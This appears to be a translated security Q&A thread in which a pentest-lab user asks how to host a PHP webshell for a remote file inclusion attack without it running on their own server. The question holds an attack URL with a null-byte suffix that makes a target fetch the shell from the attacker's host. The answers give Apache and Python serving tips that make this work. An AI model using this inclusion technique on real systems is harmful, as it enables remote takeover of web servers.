提供 php webshel​​l 而不在本地运行它

信息安全 php 阿帕奇 外壳代码 网络
2021-08-26 05:37:34

我在一个渗透测试实验室中使用 Kali Linux。

通过在受害者系统上输入以下 URL,我可以让它访问我的 apache 服务器(我在日志中看到 200 访问响应),但是 php 文件在我的系统上呈现,然后我在自己的盒子上生成了一个 webshel​​l:

https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00

如何在 apache 中“更改绑定”以防止其运行?将其更改为 a.txt似乎会阻止它在两个系统上运行;不确定我能不能这样注入

2个回答

在 apache 配置或 .htaccess 文件中使用以下设置:

php_flag engine off

另请参阅使用 .htaccess 在目录(包括所有子目录)中禁用 PHP

python -m SimpleHTTPServer 80

将为您生成一个不支持 php 的简单 http 服务器,最快的方式恕我直言

其它你可能感兴趣的问题
上一篇不完整 TCP 握手会话的影响 下一篇奥巴马的手机对 Android 和手机硬件有何评价?